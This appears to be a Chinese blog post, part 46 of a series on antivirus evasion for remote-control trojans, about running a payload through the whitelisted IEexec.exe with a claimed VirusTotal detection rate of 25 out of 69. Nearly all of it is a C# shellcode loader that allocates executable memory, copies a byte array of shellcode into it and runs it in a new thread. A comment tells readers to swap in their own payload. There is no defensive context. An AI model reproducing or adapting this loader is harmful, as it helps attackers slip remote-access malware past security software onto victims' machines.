远控免杀专题(46)-白名单IEexec.exe执行payload(VT免杀率25-69)

2010 年 11 月 10 日

using System;

using System.Runtime.InteropServices;

namespace testIEexec

{

    class Program

    {

        private static UInt32 MEM_COMMIT = 0x1000;

        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        private static UInt32 MEM_RELEASE = 0x8000;

        public static void Main(string[] args)

        {

            // 替换下面数组中的内容

            byte[] proc = new byte[894] { 0xfc, 0x48, 0x83, 0xe4, 0xf0, 0xe8, 0xc8, 0x00, 0x00, 0x00,............. };

            UInt32 funcAddr = VirtualAlloc(0, (UInt32)proc.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

            Marshal.Copy(proc, 0, (IntPtr)(funcAddr), proc.Length);

            IntPtr hThread = IntPtr.Zero;

            UInt32 threadId = 0;

            // prepare data 

            PROCESSOR_INFO info = new PROCESSOR_INFO();

            IntPtr pinfo = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(PROCESSOR_INFO)));

            Marshal.StructureToPtr(info, pinfo, false);

            // execute native code 

            hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);

            WaitForSingleObject(hThread, 0xFFFFFFFF);

            // retrive data 

            info = (PROCESSOR_INFO)Marshal.PtrToStructure(pinfo, typeof(PROCESSOR_INFO));

            Marshal.FreeHGlobal(pinfo);

            CloseHandle(hThread);

            VirtualFree((IntPtr)funcAddr, 0, MEM_RELEASE);

        }

        [DllImport("kernel32")]

        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]

        private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);

        [DllImport("kernel32")]

        private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);

        [DllImport("kernel32")]

        private static extern bool CloseHandle(IntPtr handle);

        [DllImport("kernel32")]

        private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

        [DllImport("kernel32")]

        private static extern IntPtr GetModuleHandle(string moduleName);

        [DllImport("kernel32")]

        private static extern UInt32 GetProcAddress(IntPtr hModule, string procName);

        [DllImport("kernel32")]

        private static extern UInt32 LoadLibrary(string lpFileName);

        [DllImport("kernel32")]

        private static extern UInt32 GetLastError();

        [StructLayout(LayoutKind.Sequential)]

        internal struct PROCESSOR_INFO

        {

            public UInt32 dwMax;

            public UInt32 id0;

            public UInt32 id1;

            public UInt32 id2;

            public UInt32 dwStandard;

            public UInt32 dwFeature;

            // if AMD 

            public UInt32 dwExt;

        }

    }

}

About The Author

hellowo